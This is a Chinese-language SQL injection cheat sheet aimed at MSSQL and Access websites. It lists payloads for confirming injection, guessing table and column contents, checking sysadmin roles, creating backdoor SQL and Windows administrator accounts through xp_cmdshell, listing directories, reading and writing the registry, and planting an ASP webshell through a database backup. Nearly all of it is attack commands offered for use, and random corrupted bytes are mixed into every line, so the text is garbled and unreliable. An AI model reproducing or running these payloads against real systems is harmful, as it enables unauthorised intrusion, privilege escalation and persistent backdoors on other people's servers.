1.判断是否有注入;and 1=1 ;and 1=2 -Go 7"�j��
2.初步判断是否是mssql ;and user>0 d5 7i��)=�
qqrq�1�1�W
3.注入参数是字符'and [查询条件] and ''=' svf|\p>]H
�j��z58E}�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �?L&�|Uw�+
$-}e; V�Zb
5.判断数据库系统 *^��%Q0mU[
I/�gje�nUK
;and (select count(*) from sysobjects)>0 mssql qt%���D'�
b` Hz��$�8
;and (select count(*) from msysobjects)>0 access O3�DmNq$dz
a2Pf/D]n��
,J��U@��|`
G�)v
�#�+4
6.猜数据库 ;and (select Count(*) from [数据库名])>0 W6��H,6v��
l<0}l^C�.
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �X4l@woh%
^j#rZ;uc
�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �YQ�J=�=C1
y�eD�sJ�/L
9.(1)猜字段的ascii值(access) ^�V$�Aj�t
ivDGZI�9��
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 M])dJ��9&e
;��{h�� CF
(2)猜字段的ascii值(mssql) ]I3!�fEAWR
,C%eBna4Iq
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 EI!6��MC�)
��Um#Wu]i�
10.测试权限结构(mssql) PxH72hBS��
��D?XM,l�+
J�Ro�?s~Ih
FFdB�t���B
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- b4^`DH�Ru6
;q N+�^;,2
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- *HE��uo�rl
>�D201&*G%
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �)jrV#/�m9
P) 3mX.(�}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- o�y�<WsbnS
�Y%�`�xDI
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- b[V�^86X�^
A\8}|r(>9E
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- K2%w0ohC��
,^�#yo6-
;and 1=(select IS_MEMBER('db_owner'));-- K�M^ufF2�[
y~()|��L�[
M��E'|s�aP
da)�NK���!
11.添加mssql和系统的帐户 Aq�3}N�g��
8Q_SR�w�N
;exec master.dbo.sp_addlogin username;-- >j���D[X5Y
;exec master.dbo.sp_password null,username,password;-- p<M\�U"5Ye
(}}S9����K
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �W`c'=�c��
M� Y��|�w
;exec master.dbo.xp_cmdshell 'net user username password "
Hd|7F'u=
Y�n��LErJ�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- \hCH�>�*x<
{%_L�=2n6�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- "et��PT@gF
��j~*L�~7�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- W.�kM7z>G�
�6{tx�m+�U
�itC�-4^�
Ja9e��^`i;
12.(1)遍历目录 D�9M�:�^��
s6>ZRE�f#J
;create table dirs(paths varchar(100), id int) =:~�R=/ZXk
KEWT�BB�g�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �>,td(= :�
jy'13G/�b\
;and (select top 1 paths from dirs)>0 z�[Xd%mhjO
P#AW\d^"B
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) TqnT�S0�fx
>�y,-v�:Vy
%n*-VAf�E\
a��A,!<^&}
(2)遍历目录 �K.�0:C`C
Hw4%uS==�V
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 1YH+d0U�Gn
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �MG.�`
r{5
Hro-d�1J7
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 Dd\�jHF>�u
9Q"'"�b*?z
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 >3E�o@J,?d
I"GB���<oB
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 E�V�Gt 5z
� �+llR204
�!�jTcs�N%
Y=Kc'x[,Zj
13.mssql中的存储过程 8�SGo9�[U2
&G-!q�x�e�
xp_regenumvalues 注册表根键, 子键 ��.X;3,D[w
/{&t�Y:�;m
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 bD?V�U<)�3
�R~PA�1wDZ
xp_regread 根键,子键,键值名 #�)�nS��r�
aeD��;5VV�
;exec xp_regread sfNE68�I2
�!�4X
f�~P
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 I"ok&�^t^}
�f�.�9�SB
xp_regwrite 根键,子键, 值名, 值类型, 值 p9x(D�/YP0
5rU[�T�i�r
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �O�Oo3G~2r
0.@&_XTPl
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �"��/�wyZ�
��h-�[V�H%
xp_regdeletevalue 根键,子键,值名 �$��6�9oV:
=o$sxb
E(
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 y]f"@9G��#
tIuC���ct-
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 .?loO3 m�
:s7m4!E�F�
\h�x��1�o\
&__es{;��P
14.mssql的backup创建webshell r/u A.Aou^
xjKR R��?
use model G��U��( �_
;;#q��mGoE
create table cmd(str image); r2�,�.abo�
N(�F��p�0�
insert into cmd(str) values (''); Tu)�.K.p:�
A���H�X�St
backup database model to disk='c:\l.asp'; L��h�A/�xf
pu2�tY7J�a
)mF��5Vw"�
@}}�$zv6l,
15.mssql内置函数 u=�`�L���)
\nP�E�yw,U
;and (select @@version)>0 获得Windows的版本号 �~Vr.�J}]J
)p<Ex�MIxd
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ~?K�~L�~f5
0.8�� �2kl
;and (select user_name())>0 爆当前系统的连接用户 �}&w�U�r>=
^c9t'V`IWQ
;and (select db_name())>0 得到当前连接的数据库 �CEX�"�D�`
AP'*Nh@Ik(
hE�Kf6���#
Z{]0jhUyNh
16.简洁的webshell 7$CBx/X50)
HT�X?,C_��
use model Br�f5d�T49
�PoG�-Rqe
create table cmd(str image); XAF+0 x��!
X\{�LnZ@r4
insert into cmd(str) values (''); �< t,zaIi
�j�I�C��_[
backup database model to disk='g:\wwwtest\l.asp';
